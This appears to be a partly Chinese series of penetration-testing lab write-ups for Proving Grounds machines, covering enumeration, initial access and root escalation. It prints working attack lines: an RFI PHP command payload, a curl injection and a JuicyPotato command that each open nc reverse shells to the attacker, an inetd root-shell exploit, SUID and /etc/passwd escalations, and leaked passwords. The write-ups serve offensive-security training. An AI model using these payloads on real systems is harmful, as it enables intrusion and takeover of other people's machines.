\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Nibbles]\n\u2514\u2500$ rlwrap nc -lvnp 21  \nlistening on [any] 21 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.47] 39278\nbash: cannot set terminal process group (1359): Inappropriate ioctl for device\nbash: no job control in this shell\npostgres@nibbles:\/var\/lib\/postgresql$ cd \/home\ncd \/home\npostgres@nibbles:\/home$ ls\nls\nwilson\npostgres@nibbles:\/home$ cd wilson\ncd wilson\npostgres@nibbles:\/home\/wilson$ ls\nls\nftp\nlocal.txt\npostgres@nibbles:\/home\/wilson$ cat local.txt\ncat local.txt\na242cd4b5e026c7750a45e830222c37d\npostgres@nibbles:\/home\/wilson$ <\/code><\/pre>\n\n\n\n
privilege escalation – SUID<\/h3>\n\n\n\n
find \u6709 suid \u5229\u7528 find \u63d0\u6b0a<\/p>\n\n\n\n
postgres@nibbles:\/home\/wilson$ find . -exec \/bin\/bash -p \\; -quit\nfind . -exec \/bin\/bash -p \\; -quit\nid\nuid=106(postgres) gid=113(postgres) euid=0(root) groups=113(postgres),112(ssl-cert)\ncat \/root\/proof.txt\n3c619a1a2408c1c09c953b52167d954e<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Squid<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.189<\/td>TCP:135,139,445,3128<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
3128 port \u904b\u884c Squid http proxy \uff0c\u4f7f\u7528 https:\/\/github.com\/aancw\/spose \u627e\u5230\u6709\u958b 8080 & 3306 port<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Squid\/spose]\n\u2514\u2500$ python3 spose.py --proxy 192.168.162.189:3128 --target 192.168.162.189\nScanning default common ports\nUsing proxy address 192.168.162.189:3128\n192.168.162.189:3306 seems OPEN\n192.168.162.189:8080 seems OPEN<\/code><\/pre>\n\n\n\n
\u5728 firefox \u8a2d\u5b9a\u597d proxy \u5c31\u53ef\u4ee5\u8a2a\u554f\u7db2\u7ad9\u7684 8080 port<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Initial Access – run sql shell to RCE<\/h3>\n\n\n\n
\u8a2a\u554f \/phpmyadmin \uff0c\u7528 root \u548c\u7a7a\u5bc6\u78bc\u53ef\u4ee5\u6210\u529f\u767b\u5165\u3002\u518d\u5229\u7528 sql \u5c07 webshell \u5beb\u5165\u6a94\u6848<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Squid]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.189] 49719\nwhoami\nnt authority\\system\nPS C:\\wamp\\www> type c:\\users\\administrator\\desktop\\proof.txt\nfeacfd5a024980898930072a23b3e23a\nPS C:\\wamp\\www> <\/code><\/pre>\n\n\n\n
Snookums<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.228.58<\/td>TCP:21,22,80,110,139,445,3306<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web Enumeration <\/strong><\/p>\n\n\n\n
\u7db2\u9801\u6253\u958b\u53ef\u4ee5\u770b\u5230 Simple PHP Photo Gallery v0.8 \u67e5\u4e86\u4e00\u4e0b\u767c\u73fe\u6709 RFL<\/a> <\/p>\n\n\n\n
Initial Access – RFI to RCE<\/h3>\n\n\n\n
RFL payload : <\/p>\n\n\n\n
data:\/\/text\/plain,<?php system($_GET['cmd']);?>&cmd=id<\/code><\/pre>\n\n\n\n
\u6536\u5230 revshell \u5f8c\uff0c\u53ef\u4ee5\u767c\u73fe\u6709\u4e00\u500b db.php \u7684\u6a94\u6848\u88cf\u9762\u6709 mysql \u7684 root password \uff0c\u5728 DB \u4e2d\u627e\u5230 users table \u4e26\u4e14\u88e1\u9762\u6709 username & password <\/p>\n\n\n\n
bash-4.2$ cat db.php\ncat db.php\n<?php\ndefine('DBHOST', '127.0.0.1');\ndefine('DBUSER', 'root');\ndefine('DBPASS', 'MalapropDoffUtilize1337');\ndefine('DBNAME', 'SimplePHPGal');\n?>\nbash-4.2$ mysql -uroot -pMalapropDoffUtilize1337 -h localhost\nmysql -uroot -pMalapropDoffUtilize1337 -h localhost\nmysql: [Warning] Using a password on the command line interface can be insecure.\nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 10\nServer version: 8.0.20 MySQL Community Server - GPL\n\nCopyright (c) 2000, 2020, Oracle and\/or its affiliates. All rights reserved.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nmysql> show databases;\nshow databases;\n+--------------------+\n| Database           |\n+--------------------+\n| SimplePHPGal       |\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n+--------------------+\n5 rows in set (0.01 sec)\n\nmysql> use SimplePHPGal;\nuse SimplePHPGal;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> show tables;\nshow tables;\n+------------------------+\n| Tables_in_SimplePHPGal |\n+------------------------+\n| users                  |\n+------------------------+\n1 row in set (0.00 sec)\n\nmysql> select * from users;\nselect * from users;\n+----------+----------------------------------------------+\n| username | password                                     |\n+----------+----------------------------------------------+\n| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |\n| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |\n| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |\n+----------+----------------------------------------------+\n3 rows in set (0.00 sec)\n\nmysql> exit\nexit\nBye\nbash-4.2$ <\/code><\/pre>\n\n\n\n
decode \u5169\u6b21\u5f8c\uff0c\u62ff\u5230 michael \u7684 password <\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
bash-4.2$ su michael\nsu michael\nPassword: HockSydneyCertify123\n\n[michael@snookums html]$ sudo su\nsudo su\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for michael: HockSydneyCertify123\n\nmichael is not in the sudoers file.  This incident will be reported.\n[michael@snookums html]$ cd ~\ncd ~\n[michael@snookums ~]$ ls\nls\nlocal.txt\n[michael@snookums ~]$ cat local.txt\ncat local.txt\n661ee72bc8c6e0170dfd2da58e3be5ab\n[michael@snookums ~]$ \n<\/code><\/pre>\n\n\n\n
Privilege Escalation – modify \/etc\/passwd<\/h3>\n\n\n\n
\u7528 linpeas \u767c\u73fe \/etc\/passwd \u53ef\u4ee5\u6539\uff0c\u7528\u525b\u525b\u62ff\u5230\u7684\u5e33\u5bc6 ssh \u767b\u5165\u9032\u53bb\uff0c\u9032\u53bb\u6539 \/etc\/passwd<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
[michael@snookums ~]$ openssl passwd pwn\nZOPukRruoWuxg\n[michael@snookums ~]$ vi \/etc\/passwd\n[michael@snookums ~]$ su root\nPassword: \n[root@snookums michael]# cat \/root\/proof.txt\nfdf25ed925ac23431cfd978f8fdc9e4a\n[root@snookums michael]# <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Payday<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.39<\/td>TCP:22,80,110,139,143,445,993,995<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web Enumeration <\/strong><\/p>\n\n\n\n
\u7db2\u7ad9\u904b\u884c CS-Cart \u641c\u5c0b\u4e00\u4e0b\u767c\u73fe\u53ef\u4ee5 RCE https:\/\/gist.github.com\/momenbasel\/ccb91523f86714edb96c871d4cf1d05c<\/p>\n\n\n\n
Initial Access – file upload to rce<\/h3>\n\n\n\n
\u7528 weak password \u767b\u5165 \/admin.php admin\/admin \uff0c\u627e\u5230 Template editor \u4e0a\u50b3\u4e00\u500b phtml \u6a94\u6848 \uff0c\u4e4b\u5f8c\u8a2a\u554f \/skins \u53ef\u4ee5\u76f4\u63a5\u770b\u5230\u525b\u525b\u4e0a\u50b3\u7684 revshell <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Payday]\n\u2514\u2500$ rlwrap nc -lvnp 110\nlistening on [any] 110 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.39] 41293\nbash: no job control in this shell\nwww-data@payday:\/var\/www\/skins$ ls \/home\npatrick\nwww-data@payday:\/var\/www\/skins$ cd \/home\/patrick && cat local.txt\nd60a1e66c281ae45e8bad22513caf202\nwww-data@payday:\/home\/patrick$ <\/code><\/pre>\n\n\n\n
Privilege Escalation<\/h3>\n\n\n\n
\u7528 weak password patrick\/patrick \u6210\u529f\u5207\u63db\u5230 patrick \u8eab\u5206 <\/p>\n\n\n\n
patrick@payday:~$ sudo -l\nsudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for patrick:patrick\n\nUser patrick may run the following commands on this host:\n    (ALL) ALL\npatrick@payday:~$ sudo su\nsudo su\nroot@payday:\/home\/patrick# cat \/root\/proof.txt\ncat \/root\/proof.txt\n4b853a3f3c3732e0d748f5718c0ddbb3\nroot@payday:\/home\/patrick# <\/code><\/pre>\n\n\n\n
Pelican<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.188.98<\/td>TCP:22,139,445,631,2181,2222,8080,8081,39605<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web Enumeration<\/strong><\/p>\n\n\n\n
\u6253\u958b\u7db2\u7ad9 8081 \u7aef\u53e3\u6703\u88ab redirect \u5230 http:\/\/IP:8080\/exhibitor\/v1\/ui\/index.html \uff0c\u5728\u6b64\u9801\u9762\u53ef\u4ee5\u770b\u5230\u904b\u884c\u8457 Exhibitor for ZooKeeper\uff0c\u6709 RCE \u6f0f\u6d1e<\/p>\n\n\n\n
Initial Access – Web RCE<\/h3>\n\n\n\n
\u53c3\u8003 https:\/\/github.com\/thehunt1s0n\/Exihibitor-RCE\/blob\/main\/exploit.sh <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Pelican]\n\u2514\u2500$ cat payload \ncurl -s -X POST -d '{\"zookeeperInstallDirectory\":\"\/opt\/zookeeper\",\"zookeeperDataDirectory\":\"\/zookeeper\/data\",\"zookeeperLogDirectory\":\"\",\"logIndexDirectory\":\"\",\"autoManageInstancesSettlingPeriodMs\":\"10000\",\"autoManageInstancesFixedEnsembleSize\":\"0\",\"autoManageInstancesApplyAllAtOnce\":\"1\",\"observerThreshold\":\"3\",\"serversSpec\":\"1:pelican\",\"javaEnvironment\":\"$(\/bin\/nc -e \/bin\/sh '192.168.45.186' '4444' &)\",\"log4jProperties\":\"\",\"clientPort\":\"2181\",\"connectPort\":\"2888\",\"electionPort\":\"3888\",\"checkMs\":\"2000\",\"cleanupPeriodMs\":\"200000\",\"cleanupMaxFiles\":\"10\",\"backupPeriodMs\":\"60000\",\"backupMaxStoreMs\":\"86400000\",\"autoManageInstances\":\"1\",\"zooCfgExtra\":{\"syncLimit\":\"5\",\"tickTime\":\"2000\",\"initLimit\":\"10\"},\"backupExtra\":{},\"serverId\":1}' http:\/\/192.168.188.98:8080\/exhibitor\/v1\/config\/set\n                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Pelican]\n\u2514\u2500$ bash payload \n{\"message\":\"OK\",\"succeeded\":true} <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Pelican]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.186] from (UNKNOWN) [192.168.188.98] 41012\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\ncharles@pelican:\/opt\/zookeeper$ cd ~\ncd ~\ncharles@pelican:~$ ls\nls\nlocal.txt\ncharles@pelican:~$ cat local.txt\ncat local.txt\n3be5bda7f0c6a5c389c952b07d8a5861\ncharles@pelican:~$ <\/code><\/pre>\n\n\n\n
privilege escalation – run gcore as root<\/h3>\n\n\n\n
\u53ef\u4ee5\u5df2 root \u8eab\u5206\u4f7f\u7528 gcore \uff0c\u4e26\u4e14\u67e5\u770b\u9032\u7a0b\u6709\u7591\u4f3c\u53ef\u80fd\u6d29\u6f0f password<\/p>\n\n\n\n
charles@pelican:~$ sudo -l\nsudo -l\nMatching Defaults entries for charles on pelican:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser charles may run the following commands on pelican:\n    (ALL) NOPASSWD: \/usr\/bin\/gcore\ncharles@pelican:~$ ps aux | grep pass\nps aux | grep pass\nroot       513  0.0  0.0   2276   112 ?        Ss   20:04   0:00 \/usr\/bin\/password-store\ncharles  12689  0.0  0.0   6076   824 pts\/2    S+   20:46   0:00 grep pass<\/code><\/pre>\n\n\n\n
 dumps of running processes<\/p>\n\n\n\n
charles@pelican:~$ sudo \/usr\/bin\/gcore 513\nsudo \/usr\/bin\/gcore 513\n0x00007f971bd1c6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffc3d7a2c80, remaining=remaining@entry=0x7ffc3d7a2c80) at ..\/sysdeps\/unix\/sysv\/linux\/nanosleep.c:28\n28      ..\/sysdeps\/unix\/sysv\/linux\/nanosleep.c: No such file or directory.\nSaved corefile core.513\n[Inferior 1 (process 513) detached]\ncharles@pelican:~$ ls\nls\ncore.513  local.txt\ncharles@pelican:~$ <\/code><\/pre>\n\n\n\n
\u7528 strings core file  \u627e\u5230\u5bc6\u78bc ClogKingpinInning731<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
charles@pelican:~$ su root \nsu root \nPassword: ClogKingpinInning731\n\nroot@pelican:\/home\/charles# cat \/root\/proof.txt\ncat \/root\/proof.txt\n4e88befdbd6acaf770aad3a9aa9a1bca<\/code><\/pre>\n\n\n\n
ClamAV <\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.228.42<\/td>TCP:22,25,80,139,199,445,6000<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Initial Access – SNMP leak info to RCE<\/h3>\n\n\n\n
\u7528 snmp-check \u53ef\u4ee5\u767c\u73fe\u4e3b\u6a5f\u4e0a\u6709 clamav-milter \uff0c\u67e5\u4e86\u4e00\u4e0b\u767c\u73fe\u53ef\u4ee5 RCE<\/p>\n\n\n\n
\n[*] Processes:\n\n  Id                    Status                Name                  Path                  Parameters          \n  1                     runnable              init                  init [2]                                  \n  2                     runnable              ksoftirqd\/0           ksoftirqd\/0                               \n  3                     runnable              events\/0              events\/0                                  \n  4                     runnable              khelper               khelper                                   \n  5                     runnable              kacpid                kacpid                                    \n  99                    runnable              kblockd\/0             kblockd\/0                                 \n  109                   runnable              pdflush               pdflush                                   \n  110                   runnable              pdflush               pdflush                                   \n  111                   runnable              kswapd0               kswapd0                                   \n  112                   runnable              aio\/0                 aio\/0                                     \n  255                   runnable              kseriod               kseriod                                   \n  276                   runnable              scsi_eh_0             scsi_eh_0                                 \n  284                   runnable              khubd                 khubd                                     \n  348                   runnable              shpchpd_event         shpchpd_event                             \n  380                   runnable              kjournald             kjournald                                 \n  935                   runnable              vmmemctl              vmmemctl                                  \n  1177                  runnable              vmtoolsd              \/usr\/sbin\/vmtoolsd                        \n  3768                  running               syslogd               \/sbin\/syslogd                             \n  3771                  runnable              klogd                 \/sbin\/klogd                               \n  3775                  runnable              clamd                 \/usr\/local\/sbin\/clamd                      \n  3779                  runnable              clamav-milter         \/usr\/local\/sbin\/clamav-milter  --black-hole-mode -l -o -q \/var\/run\/clamav\/clamav-milter.ctl\n  3788                  runnable              inetd                 \/usr\/sbin\/inetd                           \n  3792                  runnable              nmbd                  \/usr\/sbin\/nmbd        -D                  \n  3794                  runnable              smbd                  \/usr\/sbin\/smbd        -D                  \n  3798                  running               snmpd                 \/usr\/sbin\/snmpd       -Lsd -Lf \/dev\/null -p \/var\/run\/snmpd.pid\n  3800                  runnable              smbd                  \/usr\/sbin\/smbd        -D                  \n  3805                  runnable              sshd                  \/usr\/sbin\/sshd                            \n  3883                  runnable              sendmail-mta          sendmail: MTA: accepting connections                      \n  3900                  runnable              atd                   \/usr\/sbin\/atd                             \n  3903                  runnable              cron                  \/usr\/sbin\/cron                            \n  3910                  runnable              apache                \/usr\/sbin\/apache                          \n  3911                  runnable              apache                \/usr\/sbin\/apache                          \n  3912                  runnable              apache                \/usr\/sbin\/apache                          \n  3913                  runnable              apache                \/usr\/sbin\/apache                          \n  3914                  runnable              apache                \/usr\/sbin\/apache                          \n  3915                  runnable              apache                \/usr\/sbin\/apache                          \n  3930                  runnable              getty                 \/sbin\/getty           38400 tty1          \n  3936                  runnable              getty                 \/sbin\/getty           38400 tty2          \n  3937                  runnable              getty                 \/sbin\/getty           38400 tty3          \n  3938                  runnable              getty                 \/sbin\/getty           38400 tty4          \n  3939                  runnable              getty                 \/sbin\/getty           38400 tty5          \n  3940                  runnable              getty                 \/sbin\/getty           38400 tty6          \n  3997                  runnable              apache                \/usr\/sbin\/apache                 <\/code><\/pre>\n\n\n\n
\u4f7f\u7528 https:\/\/www.exploit-db.com\/exploits\/4761 RCE<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/ClamAV]\n\u2514\u2500$ perl 4761 192.168.228.42\nSendmail w\/ clamav-milter Remote Root Exploit\nCopyright (C) 2007 Eliteboy\nAttacking 192.168.228.42...\n220 localhost.localdomain ESMTP Sendmail 8.13.4\/8.13.4\/Debian-3sarge3; Sun, 8 Jun 2025 12:40:21 -0400; (No UCE\/UBE) logging access from: [192.168.45.228](FAIL)-[192.168.45.228]\n250-localhost.localdomain Hello [192.168.45.228], pleased to meet you\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-EXPN\n250-VERB\n250-8BITMIME\n250-SIZE\n250-DSN\n250-ETRN\n250-DELIVERBY\n250 HELP\n250 2.1.0 <>... Sender ok\n250 2.1.5 <nobody+\"|echo '31337 stream tcp nowait root \/bin\/sh -i' >> \/etc\/inetd.conf\">... Recipient ok\n250 2.1.5 <nobody+\"|\/etc\/init.d\/inetd restart\">... Recipient ok\n354 Enter mail, end with \".\" on a line by itself\n250 2.0.0 558GeLVB004117 Message accepted for delivery\n221 2.0.0 localhost.localdomain closing connection\n                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/ClamAV]\n\u2514\u2500$ rlwrap nc 192.168.228.42 31337   \nid\nuid=0(root) gid=0(root) groups=0(root)\ncat \/root\/proof.txt\n403682e06c26da0fad132f92c78aa2c4<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Algernon<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address <\/td>Ports Open<\/td><\/tr>
192.168.249.65<\/td>TCP: 21,80,135,139,445,5040,9998,14001 ……<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web Enumeration<\/strong><\/p>\n\n\n\n
\u5728 9998 \u7aef\u53e3\u53ef\u4ee5\u770b\u5230\u7db2\u7ad9\u57f7\u884c SmarterMail \uff0c\u67e5\u770b exploit SmarterMail \u64da\u6709 RCE \u6f0f\u6d1e<\/p>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u4f7f\u7528 https:\/\/www.exploit-db.com\/exploits\/49216 \uff0c\u4fee\u6539 lhost lport lhost \u3002<\/p>\n\n\n\n
Proof<\/h3>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Algernon]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.249.65] 49810\nwhoami\nnt authority\\system\nPS C:\\Windows\\system32> type c:\\users\\administrator\\desktop\\proof.txt\nfde0160c8fd8d1a2c54849555d52f034\nPS C:\\Windows\\system32> <\/code><\/pre>\n\n\n\n
Authby<\/h2>\n\n\n\n
21 (ftp) ,242 (http) ,3145 (ftp) ,3389 (rdp) port open<\/p>\n\n\n\n
ftp \u53ef\u4ee5 anonymous login \uff0c\u4f46\u662f\u6c92\u6709\u4e00\u500b\u6587\u4ef6\u662f\u6709\u6b0a\u9650\u8b80\u7684\u3002<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/AuthBy]\n\u2514\u2500$ ftp anonymous@192.168.113.46\nConnected to 192.168.113.46.\n220 zFTPServer v6.0, build 2011-10-17 15:25 ready.\n331 User name received, need password.\nPassword: \n230 User logged in, proceed.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||2048|)\n150 Opening connection for \/bin\/ls.\ntotal 9680\n----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe\n----------   1 root     root           25 Feb 10  2011 UninstallService.bat\n----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe\n----------   1 root     root           17 Aug 13  2011 StopService.bat\n----------   1 root     root           18 Aug 13  2011 StartService.bat\n----------   1 root     root         8736 Nov 09  2011 Settings.ini\ndr-xr-xr-x   1 root     root          512 Apr 15 18:58 log\n----------   1 root     root         2275 Aug 08  2011 LICENSE.htm\n----------   1 root     root           23 Feb 10  2011 InstallService.bat\ndr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions\ndr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates\ndr-xr-xr-x   1 root     root          512 Aug 03  2024 accounts\n226 Closing data connection.\nftp><\/code><\/pre>\n\n\n\n
\u5728 accounts \u8cc7\u6599\u593e\u88e1\u9762\uff0c\u53ef\u4ee5\u5230\u770b\u6709 Offsec,anonymous,admin \u9019\u4e09\u500b\u5e33\u865f\u5b58\u5728\u3002<\/p>\n\n\n\n
ftp> cd accounts\n250 CWD Command successful.\nftp> dir\n229 Entering Extended Passive Mode (|||2049|)\n150 Opening connection for \/bin\/ls.\ntotal 4\ndr-xr-xr-x   1 root     root          512 Aug 03  2024 backup\n----------   1 root     root          764 Aug 03  2024 acc[Offsec].uac\n----------   1 root     root         1030 Aug 03  2024 acc[anonymous].uac\n----------   1 root     root          926 Aug 03  2024 acc[admin].uac\n226 Closing data connection.<\/code><\/pre>\n\n\n\n
\u4f7f\u7528\u5f31\u5bc6\u78bc admin\/admin \u767b\u5165 ftp \uff0c\u4e0b\u8f09\u4e26\u67e5\u770b\u6a94\u6848<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/AuthBy]\n\u2514\u2500$ ftp admin@192.168.113.46    \nConnected to 192.168.113.46.\n220 zFTPServer v6.0, build 2011-10-17 15:25 ready.\n331 User name received, need password.\nPassword: \n230 User logged in, proceed.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||2050|)\n150 Opening connection for \/bin\/ls.\ntotal 3\n-r--r--r--   1 root     root           76 Nov 08  2011 index.php\n-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd\n-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess\n226 Closing data connection.\nftp> ^D\n221 Goodbye.\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/AuthBy]\n\u2514\u2500$ cat .ht* in*   \nAuthName \"Qui e nuce nuculeum esse volt, frangit nucem!\"\nAuthType Basic\nAuthUserFile c:\\\\wamp\\www\\.htpasswd\n<Limit GET POST PUT>\nRequire valid-user\n<\/Limit>offsec:$apr1$oRfRsc\/K$UpYpplHDlaemqseM39Ugg0\n<center><pre>Qui e nuce nuculeum esse volt, frangit nucem!<\/pre><\/center><\/code><\/pre>\n\n\n\n
\u6839\u64da .htaccess \u53ef\u4ee5\u63a8\u6e2c ftp \u6a94\u6848\u6240\u5728\u5730\uff0c\u8ddf\u7db2\u7ad9\u6240\u5728\u5730\u662f\u540c\u4e00\u500b\u8def\u5f91\uff0c\u7206\u7834 hash \u62ff\u5230\u5e33\u5bc6 offsec\/elite \uff0c\u7528\u9019\u7d44\u5e33\u5bc6\u6210\u529f\u767b\u5165\uff0c\u4e26\u4e14\u9a57\u8b49\u7db2\u7ad9\u986f\u793a\u7684\u6587\u5b57\u8ddf ftp \u770b\u5230\u7684\u662f\u4e00\u6a23\u3002\u57fa\u65bc\u9019\u500b\u601d\u8def\uff0c\u4e0a\u50b3\u4e00\u500b webshell \u4e0a\u53bb ftp \uff0c\u6210\u529f RCE\u3002<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/AuthBy]\n\u2514\u2500$ ftp admin@192.168.113.46    \nConnected to 192.168.113.46.\n220 zFTPServer v6.0, build 2011-10-17 15:25 ready.\n331 User name received, need password.\nPassword: \n230 User logged in, proceed.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> put shell.php\nlocal: shell.php remote: shell.php\n229 Entering Extended Passive Mode (|||2051|)\n150 File status okay; about to open data connection.\n100% |********************************************************************************|    30        2.70 KiB\/s    00:00 ETA\n226 Closing data connection.\n30 bytes sent in 00:00 (0.28 KiB\/s)\nftp> ^D\n221 Goodbye.\n\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/AuthBy]\n\u2514\u2500$ curl -u offsec:elite http:\/\/192.168.113.46:242\/shell.php?cmd=whoami \nlivda\\apache<\/code><\/pre>\n\n\n\n
\u9019\u53f0\u662f windows server 2008 \uff0c\u6c92\u6709 powershell \uff0c\u6211\u7528 msfvenom \u751f\u4e00\u500b exe \uff0c\u4e26\u7528 ftp \u4e0a\u50b3\u4e0a\u53bb\uff0c\u518d\u900f\u904e webshell \u53bb\u57f7\u884c\u4e0a\u50b3\u4e0a\u53bb\u7684 exe <\/p>\n\n\n\n
<\/p>\n\n\n\n
\u525b\u525b whoami \u53ef\u4ee5\u767c\u73fe\u662f apache \uff0c\u63a8\u6e2c\u662f service account \uff0c\u6c92\u610f\u5916\u61c9\u8a72\u53ef\u4ee5\u7528\u99ac\u9234\u85af\u63d0\u6b0a\u3002\u67e5\u770b\u64c1\u6709\u6b0a\u9650\u53ef\u4ee5\u767c\u73fe\u78ba\u5be6\u6709 SeImpersonatePrivilege \uff0c\u53ef\u4ee5\u5229\u7528<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/AuthBy]\n\u2514\u2500$ rlwrap nc -lvnp 4444    \nlistening on [any] 4444 ...\nconnect to [192.168.45.234] from (UNKNOWN) [192.168.113.46] 49157\nMicrosoft Windows [Version 6.0.6001]\nCopyright (c) 2006 Microsoft Corporation.  All rights reserved.\n\nC:\\wamp\\www>whoami \/priv\nwhoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                               State   \n============================= ========================================= ========\nSeChangeNotifyPrivilege       Bypass traverse checking                  Enabled \nSeImpersonatePrivilege        Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege       Create global objects                     Enabled \nSeIncreaseWorkingSetPrivilege Increase a process working set            Disabled\n<\/code><\/pre>\n\n\n\n
\u56e0\u70ba system type \u662f x86-based \u6240\u4ee5\u6211\u7528\u7684\u662f Juicy.Potato.x86.exe\uff0c\u9019\u88e1 Juicy.Potato.x86.exe,nc.exe \u6211\u7528 smb \u50b3\u8f38\u3002<\/p>\n\n\n\n
C:\\Windows\\Temp>.\\Juicy.Potato.x86.exe  -l 1337 -c \"{4991d34b-80a1-4291-83b6-3328366b9097}\" -p c:\\windows\\system32\\cmd.exe -a \"\/c C:\\Windows\\Temp\\nc.exe -e cmd.exe 192.168.45.234 6969\" -t *\n.\\Juicy.Potato.x86.exe  -l 1337 -c \"{4991d34b-80a1-4291-83b6-3328366b9097}\" -p c:\\windows\\system32\\cmd.exe -a \"\/c C:\\Windows\\Temp\\nc.exe -e cmd.exe 192.168.45.234 6969\" -t *\nTesting {4991d34b-80a1-4291-83b6-3328366b9097} 1337\n....\n[+] authresult 0\n{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\\SYSTEM\n\n[+] CreateProcessWithTokenW OK\n\nC:\\Windows\\Temp><\/code><\/pre>\n\n\n\n
